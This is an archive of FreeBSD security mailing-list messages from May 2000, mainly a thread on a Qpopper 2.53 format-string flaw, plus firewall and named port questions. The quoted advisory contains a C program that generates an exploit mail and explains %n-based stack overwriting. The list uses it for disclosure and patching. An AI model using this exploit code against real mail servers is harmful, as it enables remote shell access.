majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 24 14:45:48 2000 Delivered-To: freebsd-security@freebsd.org Received: from xkis.kis.ru (xkis.kis.ru [195.98.32.200]) by hub.freebsd.org (Postfix) with ESMTP id AD9F937BD9B for ; Wed, 24 May 2000 14:45:35 -0700 (PDT) (envelope-from dv@dv.ru) Received: from localhost (dv@localhost) by xkis.kis.ru (8.9.3/8.9.3) with ESMTP id BAA04342; Thu, 25 May 2000 01:45:25 +0400 (MSD) Date: Thu, 25 May 2000 01:45:25 +0400 (MSD) From: Dmitry Valdov X-Sender: dv@xkis.kis.ru To: Jeremy Shaffner Cc: freebsd-security@FreeBSD.ORG Subject: Re: QPOPPER: Remote gid mail exploit In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=KOI8-R Content-Transfer-Encoding: 8BIT Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi! This patch doesn't work. popper exiting with sig11 when user send UIDL xxx command. Dmitry. On Wed, 24 May 2000, Jeremy Shaffner wrote: > Date: Wed, 24 May 2000 16:40:00 -0500 (CDT) > From: Jeremy Shaffner > To: freebsd-security@FreeBSD.ORG > Subject: QPOPPER: Remote gid mail exploit > > > [Patch is at the end] > > Here is the original advisory. Note that the actual advisory is > correct WRT the file and line numbers. The posts on Bugtraq indicate to > patch pop_msg.c instead of pop_uidl.c. > > > ------>8---------- > > _____________________________________________________________________ > b u f f e r 0 v e r f l 0 w s e c u r i t y a d v i s o r y # 5 > > > Advisory Name: Remote shell via Qpopper2.53 > Date: 5/23/00 > Application: Qpopper 2.53 for *NIX > Vendor: Qualcomm Incorporated > WWW: www.qualcomm.com > Severity: can give users remote > shell with gid=mail. > Author: prizm (prizm@resentment.org) > Homepage: b0f.freebsd.lublin.pl > > > * Overview > Qpopper is the most widely-used server for the POP3 protocol. This allows users to > access their mail using any POP3 client. Qpopper supports the latest standards, > and includes a large number of optional features. Qpopper is normally used with > standard UNIX mail transfer and delivery agents such as sendmail or smail. > > > > * The Problem > Yes, Qpop, again and again... > There is a bug in version 2.53 of Qpop that can give you a remote > shell with gid=mail. Problem is with euidl command which uses user input as > format string for pop_msg() function. > Lets examine following code from Qpop 2.53 source: > --> pop_uidl.c, around line 150: > ................ > sprintf(buffer, "%d %s", msg_id, mp->uidl_str); > if (nl = index(buffer, NEWLINE)) *nl = 0; > sprintf(buffer, "%s %d %.128s", buffer, mp->length, from_hdr(p, mp)); > ! return (pop_msg (p,POP_SUCCESS, buffer)); > ^^^^^^^^^^^^^ > ................. > Function pop_msg() is declared in pop_msg.c as pop_msg(POP *p, int stat, > const char *format,...), and here we have user-input as format string. Lame. > Ok, back to problem, imagine following smtp session: > > MAIL FROM: > 200 Ok > RCPT TO: > 200 Ok > data > 200 Okey, okey. end with "." > Subject: still trust qpop?=/ > X-UIDL: AAAAAAAAAAAAAAAA > From: %p%p%p%p%p%p%p > > test > . > 200 BLABLABLA Ok, message accepted for delivery. > > Then, luser connects with his pop account and runs euidl command there: > +OK QPOP (version 2.53) at b0f starting. <666.666@b0f> > USER luser > +OK Password required for luser. > PASS secret > +OK luser has 3 messages (1644 octets). > euidl 3 > +OK 2 AAAAAAAAAAAAAAAA 530 0xbfbfc9b00x804fd740xbfbfc9b00x2120x8052e5e0xbfbfd1e80x8057028 > > Yeah, thats from my box with FreeBSD. As you can see, our %p%p%p%p%p%p%p > where implemented as arguments for vsnprintf() command. > > * Exploiting > Is this possible? Yeah, sure! > But there are some limits. Qpopper2.53 from FreeBSD ports with patches is > much more difficult to exploit than one from linux. It is because freebsd > patches change vsprintf() call in pop_msg.c to vsnprintf() call, and there is > big difference between them. Qpopper with FreeBSD's patches IS exploitable. > > Exploit > ------- > /* qpop_euidl.c exploit by prizm/Buffer0verflow Security > * > * Sample exploit for buffer overflow in Qpopper 2.53. > * This little proggie generates a mail u need to send. > * > * Standard disclaimer applies. > * By the way, exploit is broken =) You need to insert shellcode. > * > * MAD greets to tf8 for pointing out the bug, and all other b0f members. > * greets to USSRLabs and ADM > * check http://b0f.freebsd.lublin.pl/ for news. > */ > #include > #include > > char shellcode[]="imnothing"; > int main(int argc, char *argv[]) > { > int i; > unsigned long ra=0; > if(argc!=2) { > fprintf(stderr,"Usage: %s return_addr\n", argv[0]); > exit(0); > } > sscanf(argv[1], "%x", &ra); > if(!ra) > return; > if(sizeof(shellcode) < 12 || sizeof(shellcode) > 76) { > fprintf(stderr,"Bad shellcode\n"); > exit(0); > } > fprintf(stderr,"return address: 0x%.8x\n", ra); > printf("X-UIDL: "); > for(i=0; i < sizeof(shellcode);i++) > printf("%c", shellcode[i]); > printf("\r\n"); > printf("From: %s", "%.1000d"); > for(i=0; i < 50; i++) > printf("%c%c%c%c", (ra & 0xff), (ra & 0xff00)>>8, (ra & 0xff0000)>>16, (ra & 0xff000000)>>24); > printf("@test\r\n"); > printf("Subject: test\r\n\r\nhuh?\r\n.\r\n"); > return 0; > } > > Exploiting QPOP from FreeBSD ports > ---------------------------------- > > It is NOT easy, because vsprintf() is replaced with vsnprintf() so we can't > overflow stack, but we still have control over it (remeber %n?). > Im not going to post exploit for this because it is really generic, but I > will explain theory on exploiting qpop with vsNprintf. > There is an little trick with %n YOu should know. Try to understand why > folowing code succeeds and prints out 2000, not sizeof(b): > ------ > #include > int main(void){ > int s=1; char b[1024]; int q; > snprintf(b, sizeof(b), "%.2000d%n", 1, &q); > return printf("%d, overflowed? %s\n", q, (s==1?"NO":"YES")); > } > ------ > On my box with FreeBSD 3.4 i have: > 2000, overflowed? NO > > Hah, first time i expected to see 1024, but YOu know that all is > unpredictable . So, this little thing will help us a lot. > Exploiting it: > a) Find where in stack is located user input. > b) Compose a message with filed X-UIDL and From: > X-UIDL: ppRETARETARETARETA > From: %.RETURNd%n@test > where: > "pp" is for padding (two or three chars) > "RETA" is return address pointing to SHELLCODE > "SHELLCODE" guess > "RETURN" return address > > c) Exploit? If you need an exploit that will work on FreeBSD, code it yourself. > > > > * Vulnerable Versions > 2.53(Others?) > > > * Fix > You can download Qpopper 3.1 at http://www.eudora.com/freeware/qpop.html#CURRENT which > is not vulnerable to this problem. > > Or you can manually patch it by doing the following: > > At lines 152 and 62 from pop_uidl.c, replace: > - return (pop_msg (p,POP_SUCCESS, buffer)); > to: > + return (pop_msg (p,POP_SUCCESS, "%s", buffer)); > > > > > > copyright © 1999-2000 > prizm, buffer0verfl0w security > b0f.freebsd.lublin.pl > > > ---------->8------------ > > > Here is the resulting patch: > > > ---------8<-------- > > --- pop_uidl.c.orig Wed May 24 15:58:53 2000 > +++ pop_uidl.c Wed May 24 16:21:56 2000 > @@ -59,7 +59,7 @@ > > sprintf(buffer, "%d %s", msg_id, mp->uidl_str); > if (nl = index(buffer, NEWLINE)) *nl = 0; > - return (pop_msg (p,POP_SUCCESS, buffer)); > + return (pop_msg (p,POP_SUCCESS, "%s", buffer)); > } > } else { > /* yes, we can do this */ > @@ -149,7 +149,7 @@ > sprintf(buffer, "%d %s", msg_id, mp->uidl_str); > if (nl = index(buffer, NEWLINE)) *nl = 0; > sprintf(buffer, "%s %d %.128s", buffer, mp->length, from_hdr(p, > mp)); > - return (pop_msg (p,POP_SUCCESS, buffer)); > + return (pop_msg (p,POP_SUCCESS, "%s", buffer)); > } > } else { > /* yes, we can do this */ > > ------->8---------- > > > > --- > Jeremy Shaffner > System Administrator > JORSM Internet > jer@jorsm.com > http://www.jorsm.com/~jer/pgp.key > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 24 14:52:15 2000 Delivered-To: freebsd-security@freebsd.org Received: from mercury.jorsm.com (mercury.jorsm.com [207.112.128.9]) by hub.freebsd.org (Postfix) with ESMTP id B2A7C37B6F8 for ; Wed, 24 May 2000 14:52:03 -0700 (PDT) (envelope-from jer@jorsm.com) Received: by mercury.jorsm.com (Postfix, from userid 1850) id 0B216E4A1B; Wed, 24 May 2000 16:52:02 -0500 (CDT) Received: from localhost (localhost [127.0.0.1]) by mercury.jorsm.com (Postfix) with ESMTP id 00CECE0C01; Wed, 24 May 2000 16:52:01 -0500 (CDT) Date: Wed, 24 May 2000 16:52:01 -0500 (CDT) From: Jeremy Shaffner To: Dmitry Valdov Cc: freebsd-security@FreeBSD.ORG Subject: Re: QPOPPER: Remote gid mail exploit In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I don't see that happening here: uidl 2 +OK 2 AAAAAAAAAAAAAA euidl 2 +OK 2 AAAAAAAAAAAAAA 481 %p%p%p%p%p%p%p%p@foo.domain.com Without the patch you get the behavior described in the advisory: +OK 2 AAAAAAAAAAAAAA 470 0xbfbfd0340x804fd640xbfbfd0340x1d60x8052e4e0xbfbfd86c0x 80570280x5@foo.domain.com -Jeremy On Thu, 25 May 2000, Dmitry Valdov wrote: > Hi! > > This patch doesn't work. popper exiting with sig11 when user send UIDL xxx > command. > > Dmitry. > > > > Or you can manually patch it by doing the following: > > > > At lines 152 and 62 from pop_uidl.c, replace: > > - return (pop_msg (p,POP_SUCCESS, buffer)); > > to: > > + return (pop_msg (p,POP_SUCCESS, "%s", buffer)); > > > > > > Here is the resulting patch: > > > > > > ---------8<-------- > > > > --- pop_uidl.c.orig Wed May 24 15:58:53 2000 > > +++ pop_uidl.c Wed May 24 16:21:56 2000 > > @@ -59,7 +59,7 @@ > > > > sprintf(buffer, "%d %s", msg_id, mp->uidl_str); > > if (nl = index(buffer, NEWLINE)) *nl = 0; > > - return (pop_msg (p,POP_SUCCESS, buffer)); > > + return (pop_msg (p,POP_SUCCESS, "%s", buffer)); > > } > > } else { > > /* yes, we can do this */ > > @@ -149,7 +149,7 @@ > > sprintf(buffer, "%d %s", msg_id, mp->uidl_str); > > if (nl = index(buffer, NEWLINE)) *nl = 0; > > sprintf(buffer, "%s %d %.128s", buffer, mp->length, from_hdr(p, > > mp)); > > - return (pop_msg (p,POP_SUCCESS, buffer)); > > + return (pop_msg (p,POP_SUCCESS, "%s", buffer)); > > } > > } else { > > /* yes, we can do this */ > > > > ------->8---------- > > --- Jeremy Shaffner System Administrator JORSM Internet jer@jorsm.com http://www.jorsm.com/~jer/pgp.key To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 24 15: 0:49 2000 Delivered-To: freebsd-security@freebsd.org Received: from xkis.kis.ru (xkis.kis.ru [195.98.32.200]) by hub.freebsd.org (Postfix) with ESMTP id C55E937B6CD for ; Wed, 24 May 2000 15:00:43 -0700 (PDT) (envelope-from dv@dv.ru) Received: from localhost (dv@localhost) by xkis.kis.ru (8.9.3/8.9.3) with SMTP id CAA05264; Thu, 25 May 2000 02:00:36 +0400 (MSD) Date: Thu, 25 May 2000 02:00:34 +0400 (MSD) From: Dmitry Valdov X-Sender: dv@xkis.kis.ru To: Jeremy Shaffner Cc: freebsd-security@FreeBSD.ORG Subject: Re: QPOPPER: Remote gid mail exploit In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi! oops, sorry. My fault. I've inserted "%s" before PO_SUCCESS, not before "buffer". Sorry again. Dmitry. On Wed, 24 May 2000, Jeremy Shaffner wrote: > Date: Wed, 24 May 2000 16:52:01 -0500 (CDT) > From: Jeremy Shaffner > To: Dmitry Valdov > Cc: freebsd-security@FreeBSD.ORG > Subject: Re: QPOPPER: Remote gid mail exploit > > > I don't see that happening here: > > uidl 2 > +OK 2 AAAAAAAAAAAAAA > euidl 2 > +OK 2 AAAAAAAAAAAAAA 481 %p%p%p%p%p%p%p%p@foo.domain.com > > Without the patch you get the behavior described in the advisory: > > +OK 2 AAAAAAAAAAAAAA 470 > 0xbfbfd0340x804fd640xbfbfd0340x1d60x8052e4e0xbfbfd86c0x > 80570280x5@foo.domain.com > > > -Jeremy > > On Thu, 25 May 2000, Dmitry Valdov wrote: > > > Hi! > > > > This patch doesn't work. popper exiting with sig11 when user send UIDL xxx > > command. > > > > Dmitry. > > > > > > > Or you can manually patch it by doing the following: > > > > > > At lines 152 and 62 from pop_uidl.c, replace: > > > - return (pop_msg (p,POP_SUCCESS, buffer)); > > > to: > > > + return (pop_msg (p,POP_SUCCESS, "%s", buffer)); > > > > > > > > > Here is the resulting patch: > > > > > > > > > ---------8<-------- > > > > > > --- pop_uidl.c.orig Wed May 24 15:58:53 2000 > > > +++ pop_uidl.c Wed May 24 16:21:56 2000 > > > @@ -59,7 +59,7 @@ > > > > > > sprintf(buffer, "%d %s", msg_id, mp->uidl_str); > > > if (nl = index(buffer, NEWLINE)) *nl = 0; > > > - return (pop_msg (p,POP_SUCCESS, buffer)); > > > + return (pop_msg (p,POP_SUCCESS, "%s", buffer)); > > > } > > > } else { > > > /* yes, we can do this */ > > > @@ -149,7 +149,7 @@ > > > sprintf(buffer, "%d %s", msg_id, mp->uidl_str); > > > if (nl = index(buffer, NEWLINE)) *nl = 0; > > > sprintf(buffer, "%s %d %.128s", buffer, mp->length, from_hdr(p, > > > mp)); > > > - return (pop_msg (p,POP_SUCCESS, buffer)); > > > + return (pop_msg (p,POP_SUCCESS, "%s", buffer)); > > > } > > > } else { > > > /* yes, we can do this */ > > > > > > ------->8---------- > > > > > > --- > Jeremy Shaffner > System Administrator > JORSM Internet > jer@jorsm.com > http://www.jorsm.com/~jer/pgp.key > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 24 15: 4:31 2000 Delivered-To: freebsd-security@freebsd.org Received: from mercury.jorsm.com (mercury.jorsm.com [207.112.128.9]) by hub.freebsd.org (Postfix) with ESMTP id 191E437BCBC for ; Wed, 24 May 2000 15:04:28 -0700 (PDT) (envelope-from jer@jorsm.com) Received: by mercury.jorsm.com (Postfix, from userid 1850) id 3AE17E4A22; Wed, 24 May 2000 17:04:24 -0500 (CDT) Received: from localhost (localhost [127.0.0.1]) by mercury.jorsm.com (Postfix) with ESMTP id 310ADE0C01; Wed, 24 May 2000 17:04:24 -0500 (CDT) Date: Wed, 24 May 2000 17:04:24 -0500 (CDT) From: Jeremy Shaffner To: Dmitry Valdov Cc: freebsd-security@FreeBSD.ORG Subject: Re: QPOPPER: Remote gid mail exploit In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org That's what the patch is for. :) On Thu, 25 May 2000, Dmitry Valdov wrote: > Hi! > > oops, sorry. My fault. I've inserted "%s" before PO_SUCCESS, not before > "buffer". > Sorry again. > > Dmitry. > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 24 18:19:46 2000 Delivered-To: freebsd-security@freebsd.org Received: from hotmail.com (law-f48.hotmail.com [209.185.130.36]) by hub.freebsd.org (Postfix) with SMTP id 9A72B37BAA5 for ; Wed, 24 May 2000 18:19:37 -0700 (PDT) (envelope-from ronnetron@hotmail.com) Received: (qmail 90761 invoked by uid 0); 25 May 2000 01:19:36 -0000 Message-ID: <20000525011936.90760.qmail@hotmail.com> Received: from 63.203.116.218 by www.hotmail.com with HTTP; Wed, 24 May 2000 18:19:35 PDT X-Originating-IP: [63.203.116.218] From: "Ron Smith" To: freebsd-ipfw@freebsd.org Cc: freebsd-security@freebsd.org Subject: sunrpc Date: Wed, 24 May 2000 18:19:35 PDT Mime-Version: 1.0 Content-Type: text/plain; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi all, I'm running FreeBSD v3.4, and have 'ipfw' in place. I'd like to close 'sunrpc' on port 111. I can't seem to find anything specific on how to do that at freebsd.org or in "The Complete FreeBSD" or "Building Inernet Firewalls". 'netstat -na ' still shows port 111 listening on both 'tcp' and 'udp', even though 'rc.conf' has 'inetd_enable="NO"'. Can anyone point me in the right direction? TIA Ron Smith ________________________________________________________________________ Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 24 18:31:37 2000 Delivered-To: freebsd-security@freebsd.org Received: from security1.noc.flyingcroc.net (security1.noc.flyingcroc.net [207.246.128.54]) by hub.freebsd.org (Postfix) with ESMTP id 0040637B6F8; Wed, 24 May 2000 18:31:30 -0700 (PDT) (envelope-from todd@flyingcroc.net) Received: from localhost (todd@localhost) by security1.noc.flyingcroc.net (8.9.3/8.9.3) with ESMTP id SAA26925; Wed, 24 May 2000 18:30:52 -0700 (PDT) (envelope-from todd@flyingcroc.net) X-Authentication-Warning: security1.noc.flyingcroc.net: todd owned process doing -bs Date: Wed, 24 May 2000 18:30:52 -0700 (PDT) From: Todd Backman X-Sender: todd@security1.noc.flyingcroc.net To: Ron Smith Cc: freebsd-ipfw@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: sunrpc In-Reply-To: <20000525011936.90760.qmail@hotmail.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "sockstat" will help you out... On Wed, 24 May 2000, Ron Smith wrote: > Hi all, > > I'm running FreeBSD v3.4, and have 'ipfw' in place. I'd like to close > 'sunrpc' on port 111. I can't seem to find anything specific on how to do > that at freebsd.org or in "The Complete FreeBSD" or "Building Inernet > Firewalls". 'netstat -na ' still shows port 111 listening on both > 'tcp' and 'udp', even though 'rc.conf' has 'inetd_enable="NO"'. Can anyone > point me in the right direction? > > TIA > Ron Smith > > ________________________________________________________________________ > Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 24 18:31:44 2000 Delivered-To: freebsd-security@freebsd.org Received: from nameserver.austclear.com.au (nameserver.austclear.com.au [192.83.119.132]) by hub.freebsd.org (Postfix) with ESMTP id 2831737BBBF; Wed, 24 May 2000 18:31:31 -0700 (PDT) (envelope-from ahl@austclear.com.au) Received: from tungsten.austclear.com.au (tungsten.austclear.com.au [192.168.70.1]) by nameserver.austclear.com.au (8.9.3/8.9.3) with ESMTP id LAA29281; Thu, 25 May 2000 11:31:28 +1000 (EST) Received: from tungsten (tungsten [192.168.70.1]) by tungsten.austclear.com.au (8.9.3/8.9.3) with ESMTP id LAA13772; Thu, 25 May 2000 11:31:27 +1000 (EST) Message-Id: <200005250131.LAA13772@tungsten.austclear.com.au> X-Mailer: exmh version 2.1.1 10/15/1999 To: "Ron Smith" Cc: freebsd-ipfw@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: sunrpc In-Reply-To: Your message of "Wed, 24 May 2000 18:19:35 PDT." <20000525011936.90760.qmail@hotmail.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Thu, 25 May 2000 11:31:27 +1000 From: Tony Landells Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org RPC is actually controlled by the portmapper. You can disable it (assuming you have no other services that want it) by setting portmap_enable="NO". Tony To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 24 18:33:15 2000 Delivered-To: freebsd-security@freebsd.org Received: from usui.sc.newnet.co.uk (usui.sc.newnet.co.uk [212.87.80.10]) by hub.freebsd.org (Postfix) with ESMTP id 0BEC837BC9C; Wed, 24 May 2000 18:33:06 -0700 (PDT) (envelope-from peter@newnet.co.uk) Received: from newnet.co.uk (muktananda.sys.newnet.co.uk [212.87.87.37]) by usui.sc.newnet.co.uk (8.9.3/8.9.3) with ESMTP id CAA05220; Thu, 25 May 2000 02:33:11 +0100 (GMT/BST) Message-ID: <392C82A9.72A4F673@newnet.co.uk> Date: Thu, 25 May 2000 02:32:25 +0100 From: Peter Coates Organization: South Coast NOC Support Team X-Mailer: Mozilla 4.7 [en] (Win98; I) X-Accept-Language: en MIME-Version: 1.0 To: Ron Smith Cc: freebsd-ipfw@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: sunrpc References: <20000525011936.90760.qmail@hotmail.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi Ron, The following two lines should block traffic to port 111 They should be before any rules which enable traffic. ipfw add deny tcp from any to any 111 ipfw add deny udp from any to any 111 Regards, Peter ********************* http://www.newnet.co.uk FASTEST ISP in the UK - 100% availability ********************* Internet Magazine - hosting tests Dec 1999 Ron Smith wrote: > > Hi all, > > I'm running FreeBSD v3.4, and have 'ipfw' in place. I'd like to close > 'sunrpc' on port 111. I can't seem to find anything specific on how to do > that at freebsd.org or in "The Complete FreeBSD" or "Building Inernet > Firewalls". 'netstat -na ' still shows port 111 listening on both > 'tcp' and 'udp', even though 'rc.conf' has 'inetd_enable="NO"'. Can anyone > point me in the right direction? > > TIA > Ron Smith > > ________________________________________________________________________ > Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-ipfw" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 24 21:57: 2 2000 Delivered-To: freebsd-security@freebsd.org Received: from kobold.compt.com (jcicorp-gw.compt.com [207.231.193.3]) by hub.freebsd.org (Postfix) with ESMTP id 83FD737B66E for ; Wed, 24 May 2000 21:56:57 -0700 (PDT) (envelope-from klaus@kobold.compt.com) Date: Thu, 25 May 2000 00:56:53 -0400 From: Klaus Steden To: freebsd-security@freebsd.org Subject: named, and socket bindings Message-ID: <20000525005653.X6137@cthulu.compt.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I was playing a bit with 'sockstat' on the FreeBSD 3.4 boxen we have around here that offer name service. On both I noticed something that was, to me, a bit odd. The sockets that named had bound were, as expected, the domain port on all the machine's interfaces, but also, a random high UDP port. I checked two BSDI boxes (4.0) and they don't seem to have the same situation. What gives? Did I miss or forget something obvious? Why would named have to grab a port that's not port 53, unless it was doing a zone transfer (and that doesn't seem to be the case) ... is this a bit of a labour-saving measure, the FreeBSD named pre-allocates a port and uses it for zone transfers the lifetime of the whole named process? I'm curious. Anyone have the answer? thanks, Klaus -- Klaus Steden | Unix Systems Administrator | Command Post Toybox | TODO: http://www.compt.com/ | 1) Learn to use my new Unix account. klaus@compt.com | 2) Learn how to change this list. Phone: (416) 585-9995 x345 | Fax: (416) 979-0428 | To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 24 22:18:12 2000 Delivered-To: freebsd-security@freebsd.org Received: from silby.com (cb34181-a.mdsn1.wi.home.com [24.14.173.39]) by hub.freebsd.org (Postfix) with SMTP id 8FA0E37B66E for ; Wed, 24 May 2000 22:18:05 -0700 (PDT) (envelope-from silby@silby.com) Received: (qmail 23152 invoked by uid 1000); 25 May 2000 05:17:57 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 25 May 2000 05:17:57 -0000 Date: Thu, 25 May 2000 00:17:57 -0500 (CDT) From: Mike Silbersack To: Klaus Steden Cc: freebsd-security@freebsd.org Subject: Re: named, and socket bindings In-Reply-To: <20000525005653.X6137@cthulu.compt.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 25 May 2000, Klaus Steden wrote: > I was playing a bit with 'sockstat' on the FreeBSD 3.4 boxen we have around > here that offer name service. > > On both I noticed something that was, to me, a bit odd. The sockets that named > had bound were, as expected, the domain port on all the machine's interfaces, > but also, a random high UDP port. That's the port it uses as the source port for outgoing queries. Using a port other than 53 makes dns spoofing harder. I assume it changes the port, but I'm not sure at what interval. > I checked two BSDI boxes (4.0) and they don't seem to have the same situation. > What gives? Either they're running an old version of bind, or the option in named.conf to explicitly set the source port to 53 at all times has been enabled. Mike "Silby" Silbersack To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 24 23:25:36 2000 Delivered-To: freebsd-security@freebsd.org Received: from gndrsh.dnsmgr.net (GndRsh.dnsmgr.net [198.145.92.4]) by hub.freebsd.org (Postfix) with ESMTP id 1D89237B706 for ; Wed, 24 May 2000 23:25:32 -0700 (PDT) (envelope-from freebsd@gndrsh.dnsmgr.net) Received: (from freebsd@localhost) by gndrsh.dnsmgr.net (8.9.3/8.9.3) id XAA68670; Wed, 24 May 2000 23:25:16 -0700 (PDT) (envelope-from freebsd) From: "Rodney W. Grimes" Message-Id: <200005250625.XAA68670@gndrsh.dnsmgr.net> Subject: Re: named, and socket bindings In-Reply-To: <20000525005653.X6137@cthulu.compt.com> from Klaus Steden at "May 25, 2000 00:56:53 am" To: klaus@compt.com (Klaus Steden) Date: Wed, 24 May 2000 23:25:15 -0700 (PDT) Cc: freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL54 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The newer version of bind does not have to use port 53 for outbound queries, so it opens a high port for this. You can turn this off with options { query-source address * port 53; }; You can even force it to always use a specific IP address, which is great for named running behind firewalls/filter routers. > I was playing a bit with 'sockstat' on the FreeBSD 3.4 boxen we have around > here that offer name service. > > On both I noticed something that was, to me, a bit odd. The sockets that named > had bound were, as expected, the domain port on all the machine's interfaces, > but also, a random high UDP port. > > I checked two BSDI boxes (4.0) and they don't seem to have the same situation. > What gives? > > Did I miss or forget something obvious? Why would named have to grab a port > that's not port 53, unless it was doing a zone transfer (and that doesn't seem > to be the case) ... is this a bit of a labour-saving measure, the FreeBSD named > pre-allocates a port and uses it for zone transfers the lifetime of the whole > named process? > > I'm curious. > > Anyone have the answer? > > thanks, > Klaus > > -- > Klaus Steden | > Unix Systems Administrator | > Command Post Toybox | TODO: > http://www.compt.com/ | 1) Learn to use my new Unix account. > klaus@compt.com | 2) Learn how to change this list. > Phone: (416) 585-9995 x345 | > Fax: (416) 979-0428 | > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- Rod Grimes - KD7CAX @ CN85sl - (RWG25) rgrimes@gndrsh.dnsmgr.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 25 0: 4:27 2000 Delivered-To: freebsd-security@freebsd.org Received: from nsm.htp.org (nsm.htp.org [202.241.243.104]) by hub.freebsd.org (Postfix) with SMTP id A389137B9D9 for ; Thu, 25 May 2000 00:04:16 -0700 (PDT) (envelope-from sen_ml@eccosys.com) Received: (qmail 7265 invoked from network); 25 May 2000 07:00:14 -0000 Received: from localhost (127.0.0.1) by localhost with SMTP; 25 May 2000 07:00:14 -0000 To: freebsd-security@freebsd.org Subject: Re: QPOPPER: Remote gid mail exploit From: sen_ml@eccosys.com In-Reply-To: References: X-Mailer: Mew version 1.94.1 on Emacs 20.6 / Mule 4.0 (HANANOEN) X-No-Archive: Yes Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-Id: <20000525160410I.1001@eccosys.com> Date: Thu, 25 May 2000 16:04:10 +0900 X-Dispatcher: imput version 20000228(IM140) Lines: 14 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org From: Jeremy Shaffner Subject: QPOPPER: Remote gid mail exploit Date: Wed, 24 May 2000 16:40:00 -0500 (CDT) Message-ID: > [Patch is at the end] > > Here is the original advisory. Note that the actual advisory is > correct WRT the file and line numbers. The posts on Bugtraq indicate to > patch pop_msg.c instead of pop_uidl.c. while patching and restarting a qpopper server locally, i started wondering...how much of a problem is this on a freebsd system where /var/mail or /var/spool/mail is not setgid mail? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 26 1: 1:36 2000 Delivered-To: freebsd-security@freebsd.org Received: from Inter.barmentlo.net (inter.barmentlo.net [195.38.241.249]) by hub.freebsd.org (Postfix) with ESMTP id 8DF0237B5E4; Fri, 26 May 2000 01:01:27 -0700 (PDT) (envelope-from patrick@barmentlo.net) Received: from mail.barmentlo.net (cable.barmentlo.net [195.38.232.12]) by Inter.barmentlo.net (8.9.3/8.9.2) with ESMTP id KAA27631; Fri, 26 May 2000 10:01:26 +0200 (CEST) Received: from localhost (pbm@localhost) by mail.barmentlo.net (8.10.0/8.9.2) with ESMTP id e4Q81Ql87224; Fri, 26 May 2000 10:01:26 +0200 (CEST) Date: Fri, 26 May 2000 10:01:25 +0200 (CEST) From: Patrick Barmentlo 